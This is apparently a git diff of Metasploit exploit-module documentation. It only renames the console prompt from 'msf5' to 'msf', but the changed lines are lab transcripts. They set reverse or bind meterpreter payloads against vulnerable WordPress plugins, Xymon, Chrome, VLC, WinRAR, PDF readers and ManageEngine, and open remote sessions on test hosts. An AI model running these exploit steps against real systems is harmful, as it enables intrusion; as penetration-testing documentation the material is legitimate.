@@ -43,16 +43,16 @@ ## Scenarios ``` - msf5 > use exploit/unix/webapp/wp_plainview_activity_monitor_rce - msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set rhosts wordpress.test.local + msf > use exploit/unix/webapp/wp_plainview_activity_monitor_rce + msf exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set rhosts wordpress.test.local rhosts => wordpress.test.local - msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set username admin + msf exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set username admin username => admin - msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set password 123456 + msf exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set password 123456 password => 123456 - msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set vhost wordpress.test.local + msf exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set vhost wordpress.test.local vhost => wordpress.test.local - msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > show targets + msf exploit(unix/webapp/wp_plainview_activity_monitor_rce) > show targets Exploit targets: @@ -61,7 +61,7 @@ 0 WordPress - msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > exploit + msf exploit(unix/webapp/wp_plainview_activity_monitor_rce) > exploit [*] Started reverse TCP handler on 10.0.0.2:4444 [*] Trying to login... diff --git a/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md b/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md index 158be74834..711bcfaa6b 100644 --- a/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md +++ b/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md 
@@ -66,20 +66,20 @@ ## Scenarios ``` - msf5 > use exploit/unix/webapp/xymon_useradm_cmd_exec - msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > set rhosts xymon.local + msf > use exploit/unix/webapp/xymon_useradm_cmd_exec + msf exploit(unix/webapp/xymon_useradm_cmd_exec) > set rhosts xymon.local rhosts => xymon.local - msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > set username admin + msf exploit(unix/webapp/xymon_useradm_cmd_exec) > set username admin username => admin - msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > set password password + msf exploit(unix/webapp/xymon_useradm_cmd_exec) > set password password password => password - msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > set verbose true + msf exploit(unix/webapp/xymon_useradm_cmd_exec) > set verbose true verbose => true - msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > check + msf exploit(unix/webapp/xymon_useradm_cmd_exec) > check [*] 10.1.1.132:80 - Xymon version 4.3.10 [*] 10.1.1.132:80 - The target appears to be vulnerable. - msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > run + msf exploit(unix/webapp/xymon_useradm_cmd_exec) > run [*] Started reverse TCP handler on 10.1.1.170:4444 [*] 10.1.1.132:80 - Xymon version 4.3.10 diff --git a/documentation/modules/exploit/windows/browser/chrome_filereader_uaf.md b/documentation/modules/exploit/windows/browser/chrome_filereader_uaf.md index 09c82d7594..7fa78fc95e 100644 --- a/documentation/modules/exploit/windows/browser/chrome_filereader_uaf.md +++ b/documentation/modules/exploit/windows/browser/chrome_filereader_uaf.md 
@@ -24,12 +24,12 @@ Additional memory protections mean this exploit technique is not as straightforw ``` -msf5 > use exploit/windows/browser/chrome_filereader_uaf -msf5 exploit(windows/browser/chrome_filereader_uaf) > set URIPATH / +msf > use exploit/windows/browser/chrome_filereader_uaf +msf exploit(windows/browser/chrome_filereader_uaf) > set URIPATH / URIPATH => / -msf5 exploit(windows/browser/chrome_filereader_uaf) > set LHOST 192.168.0.1 +msf exploit(windows/browser/chrome_filereader_uaf) > set LHOST 192.168.0.1 LHOST => 192.168.0.1 -msf5 exploit(windows/browser/chrome_filereader_uaf) > run +msf exploit(windows/browser/chrome_filereader_uaf) > run [*] Started reverse TCP handler on 192.168.0.1:4444 [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.0.1:8080/ diff --git a/documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md b/documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md index afb22c8908..275b033734 100644 --- a/documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md +++ b/documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md @@ -9,12 +9,12 @@ at [GetGo Download Manager 5.3.0.2712](https://www.exploit-db.com/apps/b26d82ead To use this, first start the module like the following example: ``` -msf5 exploit(windows/browser/getgodm_http_response_bof) > run +msf exploit(windows/browser/getgodm_http_response_bof) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.0.12:4444 -msf5 exploit(windows/browser/getgodm_http_response_bof) > [*] Using URL: http://0.0.0.0:8080/shakeitoff.mp3 +msf exploit(windows/browser/getgodm_http_response_bof) > [*] Using URL: http://0.0.0.0:8080/shakeitoff.mp3 [*] Local IP: http://192.168.0.12:8080/shakeitoff.mp3 [*] Server started. ``` 
diff --git a/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md b/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md index 6e6660a8db..9f3b6e28c8 100644 --- a/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md +++ b/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md @@ -47,7 +47,7 @@ Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/downl msf exploit(windows/fileformat/adobe_reader_u3d) > use exploit/multi/handler msf exploit(multi/handler) > set LHOST 192.168.1.3 LHOST => 192.168.1.3 - msf5 exploit(multi/handler) > exploit + msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.3:4444 [*] Sending stage (180291 bytes) to 192.168.1.5 diff --git a/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md b/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md index aeb78d65c5..b154a0f312 100644 --- a/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md +++ b/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md @@ -38,12 +38,12 @@ Run Exploit ``` - msf5 > use exploit/windows/fileformat/boxoft_wav_to_mp3 - msf5 exploit(windows/fileformat/boxoft_wav_to_mp3) > set payload windows/meterpreter/reverse_tcp + msf > use exploit/windows/fileformat/boxoft_wav_to_mp3 + msf exploit(windows/fileformat/boxoft_wav_to_mp3) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp - msf5 exploit(windows/fileformat/boxoft_wav_to_mp3) > set lhost 192.168.37.1 + msf exploit(windows/fileformat/boxoft_wav_to_mp3) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(windows/fileformat/boxoft_wav_to_mp3) > run + msf exploit(windows/fileformat/boxoft_wav_to_mp3) > run [+] music.wav stored at /Users/space/.msf4/local/music.wav 
@@ -51,12 +51,12 @@ Set up Handler ``` - msf5 > use exploit/multi/handler - msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp + msf > use exploit/multi/handler + msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp - msf5 exploit(multi/handler) > set lhost 192.168.37.1 + msf exploit(multi/handler) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (179779 bytes) to 192.168.37.138 diff --git a/documentation/modules/exploit/windows/fileformat/cyberlink_lpp_bof.md b/documentation/modules/exploit/windows/fileformat/cyberlink_lpp_bof.md index 0571fc8198..8a154e72cd 100644 --- a/documentation/modules/exploit/windows/fileformat/cyberlink_lpp_bof.md +++ b/documentation/modules/exploit/windows/fileformat/cyberlink_lpp_bof.md 
@@ -29,28 +29,28 @@ CyberLink LabelPrint v2.5, which is available with [Power2Go 12 Essential](https ### Tested Windows 10 x64 running CyberLink LabelPrint v2.5 ``` -msf5 > use exploit/multi/handler -msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp +msf > use exploit/multi/handler +msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(multi/handler) > set lhost 172.22.222.132 +msf exploit(multi/handler) > set lhost 172.22.222.132 lhost => 172.22.222.132 -msf5 exploit(multi/handler) > set exitonsession false +msf exploit(multi/handler) > set exitonsession false exitonsession => false -msf5 exploit(multi/handler) > exploit -j +msf exploit(multi/handler) > exploit -j [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. -msf5 exploit(multi/handler) > +msf exploit(multi/handler) > [*] Started reverse TCP handler on 172.22.222.132:4444 use windows/fileformat/cyberlink_lpp_bof -msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > set lhost 172.22.222.132 +msf exploit(windows/fileformat/cyberlink_lpp_bof) > set lhost 172.22.222.132 lhost => 172.22.222.132 -msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > set target 2 +msf exploit(windows/fileformat/cyberlink_lpp_bof) > set target 2 target => 2 -msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > exploit +msf exploit(windows/fileformat/cyberlink_lpp_bof) > exploit [*] Creating 'msf.lpp' file ... [+] msf.lpp stored at /home/msfdev/.msf4/local/msf.lpp -msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > +msf exploit(windows/fileformat/cyberlink_lpp_bof) > [*] Sending stage (179779 bytes) to 172.22.222.200 [*] Meterpreter session 1 opened (172.22.222.132:4444 -> 172.22.222.200:50522) at 2018-12-11 06:24:38 -0600 sessions -i 1 
diff --git a/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md b/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md index 04342505c2..aa7b48a355 100644 --- a/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md +++ b/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md @@ -34,16 +34,16 @@ ### Documalis Free PDF Editor v5.7.2.26 on Windows 10 x64 v2004 ``` -msf5 > use exploit/windows/fileformat/documalis_pdf_editor_and_scanner -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set TARGET 0 +msf > use exploit/windows/fileformat/documalis_pdf_editor_and_scanner +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set TARGET 0 TARGET => 0 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set PAYLOAD windows/meterpreter/bind_tcp +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set RHOST 172.26.215.55 +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set RHOST 172.26.215.55 RHOST => 172.26.215.55 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set LPORT 6655 +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set LPORT 6655 LPORT => 6655 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > show options +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > show options Module options (exploit/windows/fileformat/documalis_pdf_editor_and_scanner): 
@@ -73,18 +73,18 @@ Exploit target: -- ---- 0 Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > exploit +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > exploit [+] msf.pdf stored at /home/gwillcox/.msf4/local/msf.pdf [*] Started bind TCP handler against 172.26.215.55:6655 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > use multi/handler -msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/bind_tcp +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > use multi/handler +msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp -msf5 exploit(multi/handler) > set LPORT 6655 +msf exploit(multi/handler) > set LPORT 6655 LPORT => 6655 -msf5 exploit(multi/handler) > set RHOST 172.26.215.55 +msf exploit(multi/handler) > set RHOST 172.26.215.55 RHOST => 172.26.215.55 -msf5 exploit(multi/handler) > exploit +msf exploit(multi/handler) > exploit [*] Started bind TCP handler against 172.26.215.55:6655 [*] Sending stage (176195 bytes) to 172.26.215.55 
@@ -118,16 +118,16 @@ meterpreter > ### Documalis Free PDF Scanner v5.7.2.122 on Windows 10 x64 v2004 ``` -msf5 > use exploit/windows/fileformat/documalis_pdf_editor_and_scanner -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set TARGET 1 +msf > use exploit/windows/fileformat/documalis_pdf_editor_and_scanner +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set TARGET 1 TARGET => 1 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set PAYLOAD windows/meterpreter/bind_tcp +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set RHOST 172.26.215.55 +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set RHOST 172.26.215.55 RHOST => 172.26.215.55 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set LPORT 7788 +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set LPORT 7788 LPORT => 7788 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > show options +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > show options Module options (exploit/windows/fileformat/documalis_pdf_editor_and_scanner): 
@@ -158,18 +158,18 @@ Exploit target: 1 Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > exploit +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > exploit [+] msf.pdf stored at /home/gwillcox/.msf4/local/msf.pdf [*] Started bind TCP handler against 172.26.215.55:7788 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > use multi/handler -msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > use multi/handler +msf exploit(multi/handler) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp -msf5 exploit(multi/handler) > set RHOST 172.26.215.55 +msf exploit(multi/handler) > set RHOST 172.26.215.55 RHOST => 172.26.215.55 -msf5 exploit(multi/handler) > set LPORT 7788 +msf exploit(multi/handler) > set LPORT 7788 LPORT => 7788 -msf5 exploit(multi/handler) > exploit +msf exploit(multi/handler) > exploit [*] Started bind TCP handler against 172.26.215.55:7788 [*] Sending stage (176195 bytes) to 172.26.215.55 diff --git a/documentation/modules/exploit/windows/fileformat/dupscout_xml.md b/documentation/modules/exploit/windows/fileformat/dupscout_xml.md index 2c18a103d3..b3ab0992a2 100644 --- a/documentation/modules/exploit/windows/fileformat/dupscout_xml.md +++ b/documentation/modules/exploit/windows/fileformat/dupscout_xml.md 
@@ -47,21 +47,21 @@ Note: The last make_nops will offset the location of the payload. The offset is ### Dup Scout Enterprise v10.4.16 Windows 7 SP1 x64. ``` -msf5 > use exploit/windows/fileformat/dupscout_xml -msf5 exploit(windows/fileformat/dupscout_xml) > set payload windows/meterpreter/reverse_tcp +msf > use exploit/windows/fileformat/dupscout_xml +msf exploit(windows/fileformat/dupscout_xml) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(windows/fileformat/dupscout_xml) > set lhost 172.22.222.120 +msf exploit(windows/fileformat/dupscout_xml) > set lhost 172.22.222.120 lhost => 172.22.222.120 -msf5 exploit(windows/fileformat/dupscout_xml) > run +msf exploit(windows/fileformat/dupscout_xml) > run [*] Creating 'msf.xml' file ... [+] msf.xml stored at /home/msfdev/.msf4/local/msf.xml -msf5 exploit(windows/fileformat/dupscout_xml) > use exploit/multi/handler -msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/fileformat/dupscout_xml) > use exploit/multi/handler +msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(multi/handler) > set lhost 172.22.222.120 +msf exploit(multi/handler) > set lhost 172.22.222.120 lhost => 172.22.222.120 -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 172.22.222.120:4444 [*] Sending stage (179779 bytes) to 172.22.222.122 diff --git a/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md b/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md index b05b8e8581..6a061e1365 100644 --- a/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md +++ b/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md 
@@ -40,20 +40,20 @@ share => tmp lhost => 172.22.222.197 [*] share_path: \\172.22.222.197\tmp\tmp.exe [+] test.pdf stored at /home/msfdev/.msf4/local/test.pdf -msf5 exploit(windows/fileformat/foxit_reader_uaf) > use multi/handler -msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/fileformat/foxit_reader_uaf) > use multi/handler +msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(multi/handler) > set lhost 172.22.222.197 +msf exploit(multi/handler) > set lhost 172.22.222.197 lhost => 172.22.222.197 -msf5 exploit(multi/handler) > set exitonsession false +msf exploit(multi/handler) > set exitonsession false exitonsession => false -msf5 exploit(multi/handler) > run -j +msf exploit(multi/handler) > run -j [*] Exploit running as background job 0. [*] Started reverse TCP handler on 172.22.222.197:4444 [*] Sending stage (179779 bytes) to 172.22.222.200 [*] Meterpreter session 1 opened (172.22.222.197:4444 -> 172.22.222.200:49673) at 2018-08-21 07:50:34 -0500 -msf5 exploit(multi/handler) > sessions -i 1 +msf exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo diff --git a/documentation/modules/exploit/windows/fileformat/microsoft_windows_contact.md b/documentation/modules/exploit/windows/fileformat/microsoft_windows_contact.md index b827679908..6a163b1b82 100644 --- a/documentation/modules/exploit/windows/fileformat/microsoft_windows_contact.md +++ b/documentation/modules/exploit/windows/fileformat/microsoft_windows_contact.md 
@@ -41,19 +41,19 @@ Windows Contacts 1. Configure the module-specific settings. ``` -msf5 exploit(windows/fileformat/microsoft_windows_contact) > set WEBSITE metasploit.com +msf exploit(windows/fileformat/microsoft_windows_contact) > set WEBSITE metasploit.com WEBSITE => metasploit.com -msf5 exploit(windows/fileformat/microsoft_windows_contact) > set FILENAME John Smith +msf exploit(windows/fileformat/microsoft_windows_contact) > set FILENAME John Smith FILENAME => John Smith ``` 2. Configure the payload. ``` -msf5 exploit(windows/fileformat/microsoft_windows_contact) > set PAYLOAD windows/x64/meterpreter/reverse_tcp +msf exploit(windows/fileformat/microsoft_windows_contact) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/fileformat/microsoft_windows_contact) > set LHOST 192.168.1.148 +msf exploit(windows/fileformat/microsoft_windows_contact) > set LHOST 192.168.1.148 LHOST => 192.168.1.148 -msf5 exploit(windows/fileformat/microsoft_windows_contact) > run +msf exploit(windows/fileformat/microsoft_windows_contact) > run [+] Creating 'John Smith.zip' ``` diff --git a/documentation/modules/exploit/windows/fileformat/vlc_mkv.md b/documentation/modules/exploit/windows/fileformat/vlc_mkv.md index 97a58d1d7f..3da29c6465 100644 --- a/documentation/modules/exploit/windows/fileformat/vlc_mkv.md +++ b/documentation/modules/exploit/windows/fileformat/vlc_mkv.md 
@@ -22,10 +22,10 @@ This module has been tested against 32 and 64 bit versions of VLC v2.2.8 on Wind ### Windows 10 x64 running VLC 2.2.8 (x64) ``` -msf5 > use exploit/windows/fileformat/vlc_mkv -msf5 exploit(windows/fileformat/vlc_mkv) > set lhost 172.22.222.134 +msf > use exploit/windows/fileformat/vlc_mkv +msf exploit(windows/fileformat/vlc_mkv) > set lhost 172.22.222.134 lhost => 172.22.222.134 -msf5 exploit(windows/fileformat/vlc_mkv) > run +msf exploit(windows/fileformat/vlc_mkv) > run [+] tjub-part1.mkv stored at /home/msfdev/.msf4/local/tjub-part1.mkv [*] Created tjub-part1.mkv. Target should open this file @@ -33,9 +33,9 @@ msf5 exploit(windows/fileformat/vlc_mkv) > run [*] Created tjub-part2.mkv. Put this file in the same directory as tjub-part1.mkv [*] Appending blocks to tjub-part1.mkv [+] Successfully appended blocks to tjub-part1.mkv -msf5 exploit(windows/fileformat/vlc_mkv) > handler -p windows/x64/shell/reverse_tcp -H 172.22.222.134 -P 4444 +msf exploit(windows/fileformat/vlc_mkv) > handler -p windows/x64/shell/reverse_tcp -H 172.22.222.134 -P 4444 [*] Payload handler running as background job 0. -msf5 exploit(windows/fileformat/vlc_mkv) > +msf exploit(windows/fileformat/vlc_mkv) > [*] Started reverse TCP handler on 172.22.222.134:4444 [*] Sending stage (336 bytes) to 172.22.222.200 [*] Command shell session 2 opened (172.22.222.134:4444 -> 172.22.222.200:49731) at 2018-10-10 12:08:58 -0500 diff --git a/documentation/modules/exploit/windows/fileformat/winrar_ace.md b/documentation/modules/exploit/windows/fileformat/winrar_ace.md index 9a99e7bfa6..7f890f6f31 100644 --- a/documentation/modules/exploit/windows/fileformat/winrar_ace.md +++ b/documentation/modules/exploit/windows/fileformat/winrar_ace.md 
@@ -39,13 +39,13 @@ Optional. A list of other files to be included in the resulting ACE archive. The ### Test with autogenerated payload, no additional files in archive Output from Metasploit: ``` -msf5 exploit(windows/fileformat/winrar_ace) > set LHOST 172.16.72.1 +msf exploit(windows/fileformat/winrar_ace) > set LHOST 172.16.72.1 LHOST => 172.16.72.1 -msf5 exploit(windows/fileformat/winrar_ace) > exploit +msf exploit(windows/fileformat/winrar_ace) > exploit [*] Payload filename: sGrBPr.exe [+] msf.ace stored at /home/msfdev2/.msf4/local/msf.ace -msf5 exploit(windows/fileformat/winrar_ace) > +msf exploit(windows/fileformat/winrar_ace) > ``` Verify checksums using `acefile`: @@ -101,18 +101,18 @@ msfdev2@automata:~$ Output from Metasploit: ``` -msf5 exploit(windows/fileformat/winrar_ace) > set CUSTFILE /home/msfdev2/abcdef.exe +msf exploit(windows/fileformat/winrar_ace) > set CUSTFILE /home/msfdev2/abcdef.exe CUSTFILE => /home/msfdev2/abcdef.exe -msf5 exploit(windows/fileformat/winrar_ace) > set FILENAME msf2.ace +msf exploit(windows/fileformat/winrar_ace) > set FILENAME msf2.ace FILENAME => msf2.ace -msf5 exploit(windows/fileformat/winrar_ace) > set LHOST 172.16.79.1 +msf exploit(windows/fileformat/winrar_ace) > set LHOST 172.16.79.1 LHOST => 172.16.79.1 -msf5 exploit(windows/fileformat/winrar_ace) > exploit +msf exploit(windows/fileformat/winrar_ace) > exploit [*] Using a custom payload: abcdef.exe [*] Payload filename: abcdef.exe [+] msf2.ace stored at /home/msfdev2/.msf4/local/msf2.ace -msf5 exploit(windows/fileformat/winrar_ace) > +msf exploit(windows/fileformat/winrar_ace) > ``` Verify checksums using `acefile`: 
@@ -185,21 +185,21 @@ msfdev2@automata:~$ Output from Metasploit: ``` -msf5 exploit(windows/fileformat/winrar_ace) > set CUSTFILE /home/msfdev2/abcdef.exe +msf exploit(windows/fileformat/winrar_ace) > set CUSTFILE /home/msfdev2/abcdef.exe CUSTFILE => abcdef.exe -msf5 exploit(windows/fileformat/winrar_ace) > set FILE_LIST /home/msfdev2/ace_files.txt +msf exploit(windows/fileformat/winrar_ace) > set FILE_LIST /home/msfdev2/ace_files.txt FILE_LIST => ace_files.txt -msf5 exploit(windows/fileformat/winrar_ace) > set FILENAME custom.ace +msf exploit(windows/fileformat/winrar_ace) > set FILENAME custom.ace FILENAME => custom.ace -msf5 exploit(windows/fileformat/winrar_ace) > set LHOST 172.16.79.1 +msf exploit(windows/fileformat/winrar_ace) > set LHOST 172.16.79.1 LHOST => 172.16.79.1 -msf5 exploit(windows/fileformat/winrar_ace) > exploit +msf exploit(windows/fileformat/winrar_ace) > exploit [*] Using the provided list of files @ /home/msfdev2/ace_files.txt... [*] Using a custom payload: abcdef.exe [*] Payload filename: abcdef.exe [+] custom.ace stored at /home/msfdev2/.msf4/local/custom.ace -msf5 exploit(windows/fileformat/winrar_ace) > +msf exploit(windows/fileformat/winrar_ace) > ``` Verify checksums using `acefile`: @@ -279,4 +279,4 @@ header ntsecurity b'' reserved2 b'' msfdev2@automata:~$ -``` \ No newline at end of file +``` diff --git a/documentation/modules/exploit/windows/fileformat/zahir_enterprise_plus_csv.md b/documentation/modules/exploit/windows/fileformat/zahir_enterprise_plus_csv.md index 9673672ae2..2f8a367ebb 100644 --- a/documentation/modules/exploit/windows/fileformat/zahir_enterprise_plus_csv.md +++ b/documentation/modules/exploit/windows/fileformat/zahir_enterprise_plus_csv.md 
@@ -22,7 +22,7 @@ Zahir Accounting Enterprise 6 through build 10.b contains a buffer overflow vuln ### Zahir Enterprise 6 build 10b on Windows 10 x64 ``` -msf5 exploit(windows/fileformat/zahir_enterprise_plus_csv) > +msf exploit(windows/fileformat/zahir_enterprise_plus_csv) > [*] Started reverse TCP handler on 172.22.222.130:4444 [*] Sending stage (179779 bytes) to 172.22.222.200 [*] Meterpreter session 4 opened (172.22.222.130:4444 -> 172.22.222.200:49934) at 2018-10-04 10:09:01 -0500 diff --git a/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md b/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md index 6d2f2a000c..bdfa99f151 100644 --- a/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md +++ b/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md @@ -24,7 +24,7 @@ This module exploits CVE-2015-1830 by attempting to upload a JSP payload to a ta ## Scenarios ``` -msf5 exploit(windows/http/apache_activemq_traversal_upload) > show options +msf exploit(windows/http/apache_activemq_traversal_upload) > show options Module options (exploit/windows/http/apache_activemq_traversal_upload): @@ -50,7 +50,7 @@ Payload options (java/jsp_shell_reverse_tcp): SHELL no The system shell to use. -msf5 exploit(windows/http/apache_activemq_traversal_upload) > exploit +msf exploit(windows/http/apache_activemq_traversal_upload) > exploit [*] Started reverse TCP handler on 192.168.1.1:4444 [*] Uploading payload... diff --git a/documentation/modules/exploit/windows/http/desktopcentral_deserialization.md b/documentation/modules/exploit/windows/http/desktopcentral_deserialization.md index 5bba4a3480..be4c6b4c3b 100644 --- a/documentation/modules/exploit/windows/http/desktopcentral_deserialization.md +++ b/documentation/modules/exploit/windows/http/desktopcentral_deserialization.md 
@@ -48,10 +48,10 @@ seconds, on a fresh install and calibrated to my test environment. ### Desktop Central 10.0.465 x64 on Windows 10 ``` -msf5 > use exploit/windows/http/desktopcentral_deserialization -msf5 exploit(windows/http/desktopcentral_deserialization) > set payload windows/x64/meterpreter/reverse_tcp +msf > use exploit/windows/http/desktopcentral_deserialization +msf exploit(windows/http/desktopcentral_deserialization) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/http/desktopcentral_deserialization) > options +msf exploit(windows/http/desktopcentral_deserialization) > options Module options (exploit/windows/http/desktopcentral_deserialization): @@ -85,11 +85,11 @@ Exploit target: 2 PowerShell Stager -msf5 exploit(windows/http/desktopcentral_deserialization) > set rhosts 172.16.249.139 +msf exploit(windows/http/desktopcentral_deserialization) > set rhosts 172.16.249.139 rhosts => 172.16.249.139 -msf5 exploit(windows/http/desktopcentral_deserialization) > set lhost 172.16.249.1 +msf exploit(windows/http/desktopcentral_deserialization) > set lhost 172.16.249.1 lhost => 172.16.249.1 -msf5 exploit(windows/http/desktopcentral_deserialization) > run +msf exploit(windows/http/desktopcentral_deserialization) > run [*] Started reverse TCP handler on 172.16.249.1:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md b/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md index b4286fe9a1..713c60afad 100644 --- a/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md +++ b/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md 
@@ -33,8 +33,8 @@ No additional options #### Getting a meterpreter session ``` -msf5 exploit(windows/http/dlink_central_wifimanager_rce) > -msf5 exploit(windows/http/dlink_central_wifimanager_rce) > exploit +msf exploit(windows/http/dlink_central_wifimanager_rce) > +msf exploit(windows/http/dlink_central_wifimanager_rce) > exploit [*] Started reverse TCP handler on 192.168.1.222:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md b/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md index 92834909a9..c8b5cc81f4 100644 --- a/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md +++ b/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md 
